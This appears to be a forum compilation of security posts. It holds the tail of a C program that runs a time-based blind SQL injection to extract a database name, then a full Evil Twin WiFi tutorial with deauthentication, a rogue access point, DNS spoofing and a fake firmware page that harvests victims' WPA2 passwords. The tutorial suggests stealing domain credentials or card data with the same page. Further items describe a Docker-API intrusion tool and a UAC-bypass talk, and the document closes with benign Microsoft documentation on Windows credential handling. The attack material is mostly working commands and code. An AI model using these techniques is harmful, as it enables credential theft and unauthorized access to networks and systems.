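    struct curl_slist *hdrs = NULL;
    char header[512];
    double elapsed = 0.0;

    snprintf(header, sizeof(header), "X-Forwarded-For: %s", payload);
    hdrs = curl_slist_append(NULL, header);

    curl_easy_setopt(curl, CURLOPT_URL, "http://internal.customer.info/"); /* placeholder */
    curl_easy_setopt(curl, CURLOPT_HTTPHEADER, hdrs);
    curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, discard);
    curl_easy_perform(curl);
    curl_easy_getinfo(curl, CURLINFO_TOTAL_TIME, &elapsed);

    curl_slist_free_all(hdrs);
    curl_easy_cleanup(curl);
    return elapsed > threshold;
}

int main(void)
{
    const char *charset = "abcdefghijklmnopqrstuvwxyz0123456789_"; /* placeholder */
    char name[64] = {0};
    char payload[512];

    curl_global_init(CURL_GLOBAL_DEFAULT);
    for (int pos = 1; pos <= 30; pos++) {            /* DB name is 30 chars long */
        for (const char *c = charset; *c; c++) {
            /* Same MID()/sleep() trick as in the article. */
            snprintf(payload, sizeof(payload),
                     "\"XOR(if(MID(database(),%d,1)='%c',sleep(3),0))OR\"", pos, *c);
            if (probe(payload, 2.5)) {               /* delayed => correct guess */
                name[pos - 1] = *c;
                break;
            }
        }
    }
    printf("database(): %s\n", name);
    curl_global_cleanup();
    return 0;
}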
13. Evil Twin Attack: The Definitive Guide

by Hardeep Singh, last updated Feb. 10, 2019

In this article I'll show you how an attacker can retrieve a cleartext WPA2 passphrase, fully automated, using an Evil Twin access point. No cracking is needed, and no extra hardware other than a wireless adapter. I am using a sample web page for the demonstration; an attacker can turn this webpage into basically any webapp to steal information - domain credentials, social login passwords, credit card information, and so on.

Evil Twin (noun)
Definition: A fraudulent wireless access point masquerading as a legitimate AP.

An Evil Twin access point's sole purpose is to eavesdrop on WiFi users to steal personal or corporate information without the user's knowledge. We will not be using any automated script; rather, we will understand the concept and perform the attack manually, so that you can write your own script to automate the task and make it simple and usable on low-end devices. Let's begin now!

Evil Twin Attack Methodology

Step 1: The attacker scans the air for the target access point information - SSID name, channel number, MAC address - and then uses that information to create an access point with the same characteristics, hence "Evil Twin" attack.
Step 2: Clients on the legitimate AP are repeatedly disconnected, forcing users to connect to the fraudulent access point.
Step 3: As soon as the client is connected to the fake access point, s/he may start browsing the Internet.
Step 4: The client opens a browser window and sees a web administrator warning saying "Enter WPA password to download and upgrade the router firmware".
Step 5: The moment the client enters the password, s/he is redirected to a loading page and the password is stored in the MySQL database of the attacker machine.

The persistent storage and active deauthentication make this attack automated. An attacker can also abuse this automation by simply changing the webpage. Imagine the same WPA2 password warning replaced by "Enter domain credentials to access network resources". The fake AP stays up the whole time, storing legitimate credentials in persistent storage. I'll discuss this in my Captive Portal Guide, where I'll demonstrate how an attacker can even harvest domain credentials without requiring the user to open a webpage: just connecting to the WiFi can take a user to our webpage, automatically. The WiFi user could be on Android, iOS, macOS or a Windows laptop - almost every device is susceptible. For now, I'll show you how the attack works with fewer complications.

Prerequisites

Below is the list of hardware and software used in creating this article. Use any hardware of your choice, as long as it supports the software you'll be using.

Hardware used:
A laptop (4GB RAM, Intel i5 processor)
Alfa AWUS036NH 1W wireless adapter
Huawei 3G WiFi dongle for Internet connection to the Kali virtual machine

Software used:
VMWare Workstation/Fusion 2019
Kali Linux 2019 (attacker)
Airmon-ng, airodump-ng, airbase-ng, and aireplay-ng
DNSmasq
Iptables
Apache, MySQL
Firefox web browser on Ubuntu 16.10 (victim)

Installing required tools

The aircrack-ng suite of tools, apache, mysql and iptables come pre-installed in our Kali Linux virtual machine. We just need to install dnsmasq for IP address allocation to the client.
Install dnsmasq in Kali Linux
Type in terminal:

apt-get update
apt-get install dnsmasq -y

This will update the package cache and install the latest version of the DHCP/DNS server in your Kali Linux box. Now all the required tools are installed. We need to configure apache and the DHCP server so that the access point will allocate IP addresses to the client/victim and the client will be able to access our webpage. We start by defining the IP range and the subnet mask for the DHCP server.

Configure dnsmasq
Create a configuration file for dnsmasq using vim or your favourite text editor and add the following code:

sudo vi ~/Desktop/dnsmasq.conf

~/Desktop/dnsmasq.conf:
interface=at0
dhcp-range=10.0.0.10,10.0.0.250,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

Save and exit. Use your desired name for the .conf file.

Pro Tip: Replace at0 with wlan0 everywhere when hostapd is used for creating the access point.

Parameter breakdown:
dhcp-range=10.0.0.10,10.0.0.250,12h: Client IP addresses will range from 10.0.0.10 to 10.0.0.250, with a default lease time of 12 hours.
dhcp-option=3,10.0.0.1: 3 is the code for default gateway, followed by the IP of the default gateway, i.e. 10.0.0.1.
dhcp-option=6,10.0.0.1: 6 is the code for DNS server, followed by its IP address.

(Optional) Resolve the airmon-ng and NetworkManager conflict
Before enabling monitor mode on the wireless card, let's fix the airmon-ng and NetworkManager conflict for good, so we don't need to kill NetworkManager or disconnect any network connection before putting the wireless adapter into monitor mode (we used to run airmon-ng check kill every time we needed to start a WiFi pentest).

Open NetworkManager's configuration file and put in the MAC address of the device you want NetworkManager to stop managing:

vim /etc/NetworkManager/NetworkManager.conf

Now add the following at the end of the file (keyfile syntax):

[keyfile]
unmanaged-devices=mac:AA:BB:CC:DD:EE:FF;mac:A2:B2:C2:D2:E2:F2

Now that you have edited the NetworkManager.conf file, you should have no conflicts with airmon-ng in Kali Linux. We are ready to begin.

Put the wireless adapter into monitor mode
Bring up the wireless interface:

ifconfig wlan0 up
airmon-ng start wlan0

Putting the card in monitor mode will show a similar output. Now our card is in monitor mode without any issues with NetworkManager. You can simply start monitoring the air with:

airodump-ng wlan0mon

As soon as your target AP appears in the airodump-ng output window, press CTRL+C and note these three things in a text editor:

vi info.txt

Set tx-power of the Alfa card to the maximum: 1000 mW
tx-power stands for transmission power. By default it is set to 20 dBm (decibel-milliwatts), or 100 mW. The tx-power in mW increases 10 times with every 10 dBm; see the dBm-to-mW table. If your country was set to US during installation, your card should operate at 30 dBm (1000 mW):

ifconfig wlan0mon down
iw reg set US
ifconfig wlan0mon up
iwconfig wlan0mon

If you are wondering why we need to change the region to operate the card at 1000 mW: different countries have different legal allowances for wireless devices at certain powers and frequencies. That is why Linux distributions have this information built in, and you need to change your region to allow operation at that frequency and power. The motive for powering up the card is that, when creating the hotspot, you don't need to be near the victim: the victim's device will automatically connect to the AP with the higher signal strength, even if it isn't physically nearer.
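For reference, the dBm-to-mW conversion behind that rule of thumb is P(mW) = 10^(dBm/10): 20 dBm = 10^2 = 100 mW, and 30 dBm = 10^3 = 1000 mW, which is why every +10 dBm multiplies the power by 10.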
Start the Evil Twin attack
Begin the Evil Twin attack using airbase-ng:

airbase-ng -e "rootsh3ll" -c 1 wlan0mon

By default airbase-ng creates a tap interface (at0) as the wired interface for bridging/routing the network traffic via the rogue access point. You can see it using the ifconfig at0 command. Before at0 can allocate IP addresses, we need to assign it an IP address first.

Allocate IP and subnet mask:

ifconfig at0 10.0.0.1 up

Note: the Class A IP address, 10.0.0.1, matches the dhcp-option parameters of the dnsmasq.conf file, which means at0 will act as the default gateway under dnsmasq.

Now we will use our default Internet-facing interface, eth0, to route all the traffic from the client through it. In other words, we allow the victim to access the Internet while allowing ourselves (the attacker) to sniff that traffic. For that we will use the iptables utility to set firewall rules routing all the traffic through at0 exclusively. You will get a similar output if using a VM.

Enable NAT by setting firewall rules in iptables
Enter the following commands to set up an actual NAT:

iptables --flush
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1:80
iptables -t nat -A POSTROUTING -j MASQUERADE

Make sure you enter the correct interface for --out-interface. eth0 here is the upstream interface where we want to send out the packets coming from the at0 interface (rogue AP); the rest is fine. After entering the above commands, if you want to provide Internet access to the victim, just enable routing using the command below.

Enable IP forwarding:

echo 1 > /proc/sys/net/ipv4/ip_forward

Writing "1" to the ip_forward file tells the system to enable the rules defined in iptables and start forwarding traffic (if any); 0 stands for disable. The rules will remain defined until the next reboot either way. We will leave it at 0 for this attack, as we are not providing Internet access before we get the WPA password.

Our Evil Twin attack is now ready and the rules have been enabled; next we will start the DHCP server so the fake AP can allocate IP addresses to the clients. First we need to tell the DHCP server the location of the file we created earlier, which defines the IP class, subnet mask and range of the network.
Start the dnsmasq listener
Type in terminal:

dnsmasq -C ~/Desktop/dnsmasq.conf -d

Here -C specifies the configuration file and -d runs dnsmasq in no-daemon (foreground) mode, so you can watch its log. As soon as a victim connects, you should see output similar to this:

Terminal window [ dnsmasq ]
dnsmasq: started, version 2.76 cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt DBus i18n IDN DHCP DHCPv6 no-Lua TFTP conntrack ipset auth DNSSEC loop-detect inotify
dnsmasq-dhcp: DHCP, IP range 10.0.0.10 -- 10.0.0.250, lease time 12h
dnsmasq: using nameserver 8.8.8.8#53
dnsmasq: reading /etc/resolv.conf
dnsmasq: using nameserver 8.8.8.8#53
dnsmasq: using nameserver 192.168.74.2#53
dnsmasq: read /etc/hosts - 5 addresses
dnsmasq-dhcp: 1673205542 available DHCP range: 10.0.0.10 -- 10.0.0.250
dnsmasq-dhcp: 1673205542 client provides name: rootsh3ll-iPhone
dnsmasq-dhcp: 1673205542 DHCPDISCOVER(at0) 2c:33:61:3d:c4:2e
dnsmasq-dhcp: 1673205542 tags: at0
dnsmasq-dhcp: 1673205542 DHCPOFFER(at0) 10.0.0.247 2c:33:61:3a:c4:2f
dnsmasq-dhcp: 1673205542 requested options: 1:netmask, 121:classless-static-route, 3:router,
<-----------------------------------------SNIP----------------------------------------->
dnsmasq-dhcp: 1673205542 available DHCP range: 10.0.0.10 -- 10.0.0.250

In case you face any issues with the DHCP server, just kill the currently running DHCP processes:

killall dnsmasq dhcpd isc-dhcp-server

and run dnsmasq again. It should work now.

Start the services
Now start apache and MySQL:

/etc/init.d/apache2 start
/etc/init.d/mysql start

We have our Evil Twin attack vector up and working perfectly. Now we need to put our fake webpage into action, so that the victim sees it while browsing and enters the passphrase s/he uses for the access point.

Download the rogue AP configuration files:

wget https://cdn.rootsh3ll.com/u/20180724181033/Rogue_AP.zip

and simply enter the following command in terminal:

unzip Rogue_AP.zip -d /var/www/html/

This command extracts the contents of the Rogue_AP.zip file and copies them to apache's html directory, so that when the victim opens a browser s/he is automatically redirected to the default index.html webpage.

To store the credentials entered by the victim on the html page, we need an SQL database. You will see a dbconnect.php file for that, but for it to work you need the database created already, so that dbconnect.php can reflect the changes in the DB.

Open terminal and type:

mysql -u root -p

Create a new user fakeap with password fakeap (since version 5.7 you cannot execute MySQL queries from PHP as the root user):

create user fakeap@localhost identified by 'fakeap';

Now create the database and table as defined in dbconnect.php:

create database rogue_AP;
use rogue_AP;
create table wpa_keys(password1 varchar(32), password2 varchar(32));

It should go like this:

Grant fakeap all the permissions on the rogue_AP database:

grant all privileges on rogue_AP.* to 'fakeap'@'localhost';

Exit and log in using the new user:

mysql -u fakeap -p

Select the rogue_AP database:

use rogue_AP;

Insert a test value in the table:

insert into wpa_keys(password1, password2) values ("testpass", "testpass");
select * from wpa_keys;

Note that both values are the same here; that means the password and the confirmation password must match. Our attack is now ready: just wait for the client to connect and watch the credentials come in. In some cases your client might already be connected to the original AP. You need to disconnect the client, as we did in the previous chapters, using the aireplay-ng utility.
Syntax: aireplay-ng --deauth 0 -a <BSSID> <Interface>

aireplay-ng --deauth 0 -a FC:DD:55:08:4F:C2 wlan0mon

--deauth 0: unlimited de-authentication requests. Limit the requests by entering a natural number instead. We are using 0 so that every client disconnects from that specific BSSID and connects to our AP, as it has the same name as the real AP and is an open access point.

As soon as a client connects to your AP, you will see activity in the airbase-ng terminal window like this. Now, to simulate the client side, I am using an Ubuntu machine connected via WiFi and a Firefox web browser to illustrate the attack. The victim can now access the Internet. You can do two things at this stage:

Sniff the client traffic
Redirect all the traffic to the fake AP page

The latter is what we want to do: redirect the client to our fake AP page. Just run this command:

dnsspoof -i at0

It will redirect all HTTP traffic coming from the at0 interface - but not HTTPS traffic, due to browsers' built-in list of HSTS websites. You can't redirect HTTPS traffic without triggering an SSL/TLS error on the victim's machine.

When the victim tries to access any website (google.com in this case), s/he will see this page, which tells the victim to enter the password to download and upgrade the firmware. Here I am entering "iamrootsh3ll" as the password that I (the victim) think is the AP's password. As soon as the victim presses [ENTER], s/he will see this.

Now, coming back to the attacker side, you need to check the MySQL database for the stored passwords. Just type the previously used command in the MySQL terminal window and see whether a new entry is there. After simulating this, I checked the MySQL DB, and here is the output. Voila! You have successfully harvested the WPA2 passphrase, right from the victim, in plain text. Now close all the terminal windows and connect back to the real AP to check whether the password is correct - or whether the victim was himself a hacker and tricked you!

Note that you don't have to name your AP after an existing one; you can also use a generic "free open WiFi"-style name to gather clients on your AP and start pentesting.

Want to go even deeper?
If you are serious about WiFi penetration testing and security, I have something for you: the WiFi Hacking in the Cloud video course. It will take you from a complete beginner to a full-blown blue teamer who can not only pentest a WiFi network but also detect rogue devices on a network, detect network anomalies, perform threat detection on multiple networks at once, create email reports and visual dashboards for easier understanding, and handle incidents and respond to the Security Operations Center.

Apart from that, the USP of the course? WiFi hacking without a WiFi card - a.k.a. the cloud labs. The cloud labs allow you to simply log into your Kali machine and start sniffing WiFi traffic, perform low- and high-level WiFi attacks, and learn all about WiFi security, entirely in your lab.

The labs can be accessed in 2 ways:
1. Via browser - just use your login link and the associated password
2. Via SSH - if you want an even faster, latency-free experience

Here's a screenshot of the GUI lab running in the Chrome browser (note the URL; it's running on the Amazon AWS cloud). Click here to learn all about the WiFi Security video course.

Sursa: https://rootsh3ll.com/evil-twin-attack/
14. Gorsair
Gorsair is a penetration testing tool for discovering and remotely accessing Docker APIs from vulnerable Docker containers. Once it has access to the Docker daemon, you can use Gorsair to directly execute commands on remote containers.

Exposing the Docker API on the internet is a tremendous risk, as it can let malicious agents get information on all of the other containers, images and the system, as well as potentially gain privileged access to the whole system if the image uses the root user.

Command line options

-t, --targets: Set targets according to the nmap target format. Required. Example: --targets="192.168.1.72,192.168.1.74"
-p, --ports: (Default: 2375,2376) Set custom ports.
-s, --speed: (Default: 4) Set custom nmap discovery presets to improve speed or accuracy. It's recommended to lower it if you are attempting to scan an unstable and slow network, or to increase it if on a very performant and reliable network. You might also want to keep it low to keep your discovery stealthy. See this for more info on the nmap timing templates.
-D, --decoys: List of decoy IP addresses to use (see the decoy section of the nmap documentation)
-e, --interface: Network interface to use
--proxies: List of HTTP/SOCKS4 proxies to relay connections through (see documentation)
-S, --spoof-ip: IP address to use for IP spoofing
--spoof-mac: MAC address to use for MAC spoofing
-v, --verbose: Enable verbose logging
-h, --help: Display the usage information

(An example invocation is sketched below, after the protection notes.)

How can I protect my containers from this attack?

Avoid putting containers that have access to the Docker socket on the internet
Avoid using the root account in Docker containers

Sursa: https://github.com/Ullaakut/Gorsair
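For illustration, a typical scan of the example targets from the options list above might be launched like this (assuming the compiled binary is on your PATH as gorsair; adjust the flags to your environment):

gorsair --targets="192.168.1.72,192.168.1.74" --ports=2375,2376 --speed=4 --verbose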
15. ZeroNights

Published on Jan 19, 2018

UAC, specifically Admin-Approval mode, has been known to be broken ever since it was first released in Windows Vista. Most research on bypassing UAC has focused on abusing bad elevated application behavior, auto-elevation, or shared registry and file resources. However, UAC was fundamentally broken from day one due to the way Microsoft implemented the security around elevated processes, especially their access tokens. This presentation will go into depth on why this technique works, allowing you to silently gain administrator privileges if a single elevated application is running. It will describe how Microsoft tried to fix it in Windows 10, and how you can circumvent their defences. It will also go into detail on a previously undocumented technique to abuse the assumed, more secure, Over-The-Shoulder elevation on Windows 10.

Slides - https://2017.zeronights.org/wp-conten...
16. Credentials Processes in Windows Authentication

10/12/2016
Applies To: Windows Server (Semi-Annual Channel), Windows Server 2016

This reference topic for the IT professional describes how Windows authentication processes credentials. Windows credentials management is the process by which the operating system receives the credentials from the service or user and secures that information for future presentation to the authenticating target. In the case of a domain-joined computer, the authenticating target is the domain controller. The credentials used in authentication are digital documents that associate the user's identity to some form of proof of authenticity, such as a certificate, a password, or a PIN.

By default, Windows credentials are validated against the Security Accounts Manager (SAM) database on the local computer, or against Active Directory on a domain-joined computer, through the Winlogon service. Credentials are collected through user input on the logon user interface or programmatically via the application programming interface (API) to be presented to the authenticating target.

Local security information is stored in the registry under HKEY_LOCAL_MACHINE\SECURITY. Stored information includes policy settings, default security values, and account information, such as cached logon credentials. A copy of the SAM database is also stored here, although it is write-protected.

The following diagram shows the components that are required and the paths that credentials take through the system to authenticate the user or process for a successful logon. The following table describes each component that manages credentials in the authentication process at the point of logon.

Authentication components for all systems

User logon: Winlogon.exe is the executable file responsible for managing secure user interactions. The Winlogon service initiates the logon process for Windows operating systems by passing the credentials collected by user action on the secure desktop (Logon UI) to the Local Security Authority (LSA) through Secur32.dll.

Application logon: Application or service logons that do not require interactive logon. Most processes initiated by the user run in user mode by using Secur32.dll, whereas processes initiated at startup, such as services, run in kernel mode by using Ksecdd.sys. For more information about user mode and kernel mode, see Applications and User Mode or Services and Kernel Mode in this topic.

Secur32.dll: The multiple authentication providers that form the foundation of the authentication process.

Lsasrv.dll: The LSA Server service, which both enforces security policies and acts as the security package manager for the LSA. The LSA contains the Negotiate function, which selects either the NTLM or Kerberos protocol after determining which protocol is to be successful.

Security Support Providers: A set of providers that can individually invoke one or more authentication protocols. The default set of providers can change with each version of the Windows operating system, and custom providers can be written.

Netlogon.dll: The services that the Net Logon service performs are as follows:
- Maintains the computer's secure channel (not to be confused with Schannel) to a domain controller.
- Passes the user's credentials through a secure channel to the domain controller and returns the domain security identifiers (SIDs) and user rights for the user.
- Publishes service resource records in the Domain Name System (DNS) and uses DNS to resolve names to the Internet Protocol (IP) addresses of domain controllers.
- Implements the replication protocol based on remote procedure call (RPC) for synchronizing primary domain controllers (PDCs) and backup domain controllers (BDCs).

Samsrv.dll: The Security Accounts Manager (SAM), which stores local security accounts, enforces locally stored policies and supports APIs.

Registry: The Registry contains a copy of the SAM database, local security policy settings, default security values, and account information that is only accessible to the system.

This topic contains the following sections:
- Credential input for user logon
- Credential input for application and service logon
- Local Security Authority
- Cached credentials and validation
- Credential storage and validation
- Security Accounts Manager database
- Local domains and trusted domains
- Certificates in Windows authentication

Credential input for user logon

In Windows Server 2008 and Windows Vista, the Graphical Identification and Authentication (GINA) architecture was replaced with a credential provider model, which made it possible to enumerate different logon types through the use of logon tiles. Both models are described below.

Graphical Identification and Authentication architecture

The Graphical Identification and Authentication (GINA) architecture applies to the Windows Server 2003, Microsoft Windows 2000 Server, Windows XP, and Windows 2000 Professional operating systems. In these systems, every interactive logon session creates a separate instance of the Winlogon service. The GINA architecture is loaded into the process space used by Winlogon, receives and processes the credentials, and makes the calls to the authentication interfaces through LSALogonUser.

The instances of Winlogon for an interactive logon run in Session 0. Session 0 hosts system services and other critical processes, including the Local Security Authority (LSA) process. The following diagram shows the credential process for Windows Server 2003, Microsoft Windows 2000 Server, Windows XP, and Microsoft Windows 2000 Professional.

Credential provider architecture

The credential provider architecture applies to those versions designated in the Applies To list at the beginning of this topic. In these systems, the credentials input architecture changed to an extensible design by using credential providers. These providers are represented by the different logon tiles on the secure desktop that permit any number of logon scenarios - different accounts for the same user and different authentication methods, such as password, smart card, and biometrics.

With the credential provider architecture, Winlogon always starts Logon UI after it receives a secure attention sequence event. Logon UI queries each credential provider for the number of different credential types the provider is configured to enumerate. Credential providers have the option of specifying one of these tiles as the default. After all providers have enumerated their tiles, Logon UI displays them to the user. The user interacts with a tile to supply their credentials. Logon UI submits these credentials for authentication.

Credential providers are not enforcement mechanisms. They are used to gather and serialize credentials. The Local Security Authority and authentication packages enforce security.
Credential providers are registered on the computer and are responsible for the following:
- Describing the credential information required for authentication.
- Handling communication and logic with external authentication authorities.
- Packaging credentials for interactive and network logon.

Packaging credentials for interactive and network logon includes the process of serialization. By serializing credentials, multiple logon tiles can be displayed on the logon UI. Therefore, your organization can control the logon display - such as users, target systems for logon, pre-logon access to the network, and workstation lock/unlock policies - through the use of customized credential providers. Multiple credential providers can co-exist on the same computer.

Single sign-on (SSO) providers can be developed as a standard credential provider or as a Pre-Logon-Access Provider. Each version of Windows contains one default credential provider and one default Pre-Logon-Access Provider (PLAP), also known as the SSO provider. The SSO provider permits users to make a connection to a network before logging on to the local computer. When this provider is implemented, the provider does not enumerate tiles on Logon UI.

An SSO provider is intended to be used in the following scenarios:

- Network authentication and computer logon are handled by different credential providers. Variations to this scenario include:
  - A user has the option of connecting to a network, such as connecting to a virtual private network (VPN), before logging on to the computer but is not required to make this connection.
  - Network authentication is required to retrieve information used during interactive authentication on the local computer.
  - Multiple network authentications are followed by one of the other scenarios. For example, a user authenticates to an Internet service provider (ISP), authenticates to a VPN, and then uses their user account credentials to log on locally.
  - Cached credentials are disabled, and a Remote Access Services connection through VPN is required before local logon to authenticate the user.
  - A domain user does not have a local account set up on a domain-joined computer and must establish a Remote Access Services connection through a VPN connection before completing interactive logon.
- Network authentication and computer logon are handled by the same credential provider. In this scenario, the user is required to connect to the network before logging on to the computer.

Logon tile enumeration

The credential provider enumerates logon tiles in the following instances:
- For those operating systems designated in the Applies To list at the beginning of this topic, the credential provider enumerates the tiles for workstation logon. The credential provider typically serializes credentials for authentication to the local security authority. This process displays tiles specific to each user and specific to each user's target systems.
- The logon and authentication architecture lets a user use tiles enumerated by the credential provider to unlock a workstation. Typically, the currently logged-on user is the default tile, but if more than one user is logged on, numerous tiles are displayed.
- The credential provider enumerates tiles in response to a user request to change their password or other private information, such as a PIN. Typically, the currently logged-on user is the default tile; however, if more than one user is logged on, numerous tiles are displayed.
- The credential provider enumerates tiles based on the serialized credentials to be used for authentication on remote computers. Credential UI does not use the same instance of the provider as the Logon UI, Unlock Workstation, or Change Password. Therefore, state information cannot be maintained in the provider between instances of Credential UI. This structure results in one tile for each remote computer logon, assuming the credentials have been correctly serialized. This scenario is also used in User Account Control (UAC), which can help prevent unauthorized changes to a computer by prompting the user for permission or an administrator password before permitting actions that could potentially affect the computer's operation or that could change settings that affect other users of the computer.

The following diagram shows the credential process for the operating systems designated in the Applies To list at the beginning of this topic.

Credential input for application and service logon

Windows authentication is designed to manage credentials for applications or services that do not require user interaction. Applications in user mode are limited in terms of what system resources they have access to, while services can have unrestricted access to the system memory and external devices.

System services and transport-level applications access a Security Support Provider (SSP) through the Security Support Provider Interface (SSPI) in Windows, which provides functions for enumerating the security packages available on a system, selecting a package, and using that package to obtain an authenticated connection.

When a client/server connection is authenticated (a condensed client-side sketch appears below, after this subsection):
- The application on the client side of the connection sends credentials to the server by using the SSPI function InitializeSecurityContext (General).
- The application on the server side of the connection responds with the SSPI function AcceptSecurityContext (General).
- The SSPI functions InitializeSecurityContext (General) and AcceptSecurityContext (General) are repeated until all the necessary authentication messages have been exchanged to either succeed or fail authentication.
- After the connection has been authenticated, the LSA on the server uses information from the client to build the security context, which contains an access token.
- The server can then call the SSPI function ImpersonateSecurityContext to attach the access token to an impersonation thread for the service.

Applications and user mode

User mode in Windows is composed of two systems capable of passing I/O requests to the appropriate kernel-mode drivers: the environment system, which runs applications written for many different types of operating systems, and the integral system, which operates system-specific functions on behalf of the environment system. The integral system manages operating system-specific functions on behalf of the environment system and consists of a security system process (the LSA), a workstation service, and a server service. The security system process deals with security tokens, grants or denies permissions to access user accounts based on resource permissions, handles logon requests and initiates logon authentication, and determines which system resources the operating system needs to audit.

Applications can run in user mode where the application can run as any principal, including in the security context of Local System (SYSTEM). Applications can also run in kernel mode where the application can run in the security context of Local System (SYSTEM).
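To make the client/server handshake enumerated above concrete, here is a condensed, hypothetical sketch of the client side in C. It uses the Negotiate package; the target SPN is a placeholder, error handling is trimmed, and the network transport between the two SSPI calls is deliberately omitted:

/* Sketch: client side of the SSPI handshake described above.
 * Link with secur32.lib. SPN, buffer sizes and transport are placeholders. */
#define SECURITY_WIN32
#include <windows.h>
#include <security.h>

void SspiClientHandshake(void)
{
    CredHandle hCred;
    CtxtHandle hCtxt;
    TimeStamp expiry;
    SecBuffer outBuf = { 0, SECBUFFER_TOKEN, NULL };
    SecBufferDesc outDesc = { SECBUFFER_VERSION, 1, &outBuf };
    ULONG attrs = 0;
    BYTE token[12288];

    /* Select a security package (Negotiate picks Kerberos or NTLM). */
    AcquireCredentialsHandleA(NULL, "Negotiate", SECPKG_CRED_OUTBOUND,
                              NULL, NULL, NULL, NULL, &hCred, &expiry);

    outBuf.pvBuffer = token;
    outBuf.cbBuffer = sizeof(token);

    /* First call: no input token yet; produces the first token to send. */
    SECURITY_STATUS st = InitializeSecurityContextA(
        &hCred, NULL, "host/server.example.com", /* placeholder SPN */
        ISC_REQ_CONFIDENTIALITY, 0, SECURITY_NATIVE_DREP,
        NULL, 0, &hCtxt, &outDesc, &attrs, &expiry);

    while (st == SEC_I_CONTINUE_NEEDED) {
        /* 1. Send outBuf to the server, which feeds it to
         *    AcceptSecurityContext and replies with its own token.
         * 2. Receive the server token into inBuf (transport omitted). */
        SecBuffer inBuf = { 0, SECBUFFER_TOKEN, NULL };
        SecBufferDesc inDesc = { SECBUFFER_VERSION, 1, &inBuf };
        /* ... fill inBuf from the network here ... */

        outBuf.cbBuffer = sizeof(token); /* reset the output buffer */
        st = InitializeSecurityContextA(
            &hCred, &hCtxt, "host/server.example.com",
            ISC_REQ_CONFIDENTIALITY, 0, SECURITY_NATIVE_DREP,
            &inDesc, 0, &hCtxt, &outDesc, &attrs, &expiry);
    }
    /* st == SEC_E_OK: the context is established; the server's LSA has
     * built the security context / access token for this client. */
}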
SSPI is available through the Secur32.dll module, which is an API used for obtaining integrated security services for authentication, message integrity, and message privacy. It provides an abstraction layer between application-level protocols and security protocols. Because different applications require different ways of identifying or authenticating users and different ways of encrypting data as it travels across a network, SSPI provides a way to access dynamic-link libraries (DLLs) that contain different authentication and cryptographic functions. These DLLs are called Security Support Providers (SSPs).

Managed service accounts and virtual accounts were introduced in Windows Server 2008 R2 and Windows 7 to provide crucial applications, such as Microsoft SQL Server and Internet Information Services (IIS), with the isolation of their own domain accounts, while eliminating the need for an administrator to manually administer the service principal name (SPN) and credentials for these accounts. For more information about these features and their role in authentication, see Managed Service Accounts Documentation for Windows 7 and Windows Server 2008 R2 and Group Managed Service Accounts Overview.

Services and kernel mode

Even though most Windows applications run in the security context of the user who starts them, this is not true of services. Many Windows services, such as network and printing services, are started by the service controller when the user starts the computer. These services might run as Local Service or Local System and might continue to run after the last human user logs off.

Note: Services normally run in security contexts known as Local System (SYSTEM), Network Service, or Local Service. Windows Server 2008 R2 introduced services that run under managed service accounts, which are domain principals.

Before starting a service, the service controller logs on by using the account that is designated for the service, and then presents the service's credentials for authentication by the LSA. The Windows service implements a programmatic interface that the service control manager can use to control the service. A Windows service can be started automatically when the system is started or manually with a service control program. For example, when a Windows client computer joins a domain, the messenger service on the computer connects to a domain controller and opens a secure channel to it. To obtain an authenticated connection, the service must have credentials that the remote computer's Local Security Authority (LSA) trusts. When communicating with other computers in the network, LSA uses the credentials for the local computer's domain account, as do all other services running in the security context of the Local System and Network Service. Services on the local computer run as SYSTEM, so credentials do not need to be presented to the LSA.

The file Ksecdd.sys manages and encrypts these credentials and uses a local procedure call into the LSA. The file type is DRV (driver) and is known as the kernel-mode Security Support Provider (SSP) and, in those versions designated in the Applies To list at the beginning of this topic, is FIPS 140-2 Level 1-compliant. Kernel mode has full access to the hardware and system resources of the computer. The kernel mode stops user-mode services and applications from accessing critical areas of the operating system that they should not have access to.
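As a deliberately minimal illustration of the programmatic interface a service exposes to the service control manager, here is a hypothetical C skeleton; the service name is a placeholder, and the account the service runs under (Local System, Network Service, a managed service account, ...) is chosen when the service is installed, not in this code:

/* Sketch: minimal Windows service skeleton. The SCM logs on the
 * designated account before starting us, then calls ServiceMain. */
#include <windows.h>

static SERVICE_STATUS g_Status;
static SERVICE_STATUS_HANDLE g_StatusHandle;

static void WINAPI CtrlHandler(DWORD ctrl)
{
    if (ctrl == SERVICE_CONTROL_STOP) {
        g_Status.dwCurrentState = SERVICE_STOPPED;
        SetServiceStatus(g_StatusHandle, &g_Status);
    }
}

static void WINAPI ServiceMain(DWORD argc, LPSTR *argv)
{
    (void)argc; (void)argv;
    g_StatusHandle = RegisterServiceCtrlHandlerA("MySampleSvc", CtrlHandler);

    g_Status.dwServiceType      = SERVICE_WIN32_OWN_PROCESS;
    g_Status.dwCurrentState     = SERVICE_RUNNING;
    g_Status.dwControlsAccepted = SERVICE_ACCEPT_STOP;
    SetServiceStatus(g_StatusHandle, &g_Status);

    /* Real work would happen here, in the security context the SCM
     * logged on for us (Local System, Network Service, an MSA, ...). */
}

int main(void)
{
    SERVICE_TABLE_ENTRYA table[] = {
        { (LPSTR)"MySampleSvc", ServiceMain },  /* placeholder name */
        { NULL, NULL }
    };
    /* Connects this process to the SCM, which then calls ServiceMain. */
    StartServiceCtrlDispatcherA(table);
    return 0;
}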
Local Security Authority

The Local Security Authority (LSA) is a protected system process that authenticates and logs users on to the local computer. In addition, LSA maintains information about all aspects of local security on a computer (these aspects are collectively known as the local security policy), and it provides various services for translation between names and security identifiers (SIDs). The security system process, Local Security Authority Server Service (LSASS), keeps track of the security policies and the accounts that are in effect on a computer system.

The LSA validates a user's identity based on which of the following two entities issued the user's account:
- Local Security Authority: The LSA can validate user information by checking the Security Accounts Manager (SAM) database located on the same computer. Any workstation or member server can store local user accounts and information about local groups. However, these accounts can be used for accessing only that workstation or computer.
- Security authority for the local domain or for a trusted domain: The LSA contacts the entity that issued the account and requests verification that the account is valid and that the request originated from the account holder.

The Local Security Authority Subsystem Service (LSASS) stores credentials in memory on behalf of users with active Windows sessions. The stored credentials let users seamlessly access network resources, such as file shares, Exchange Server mailboxes, and SharePoint sites, without re-entering their credentials for each remote service.

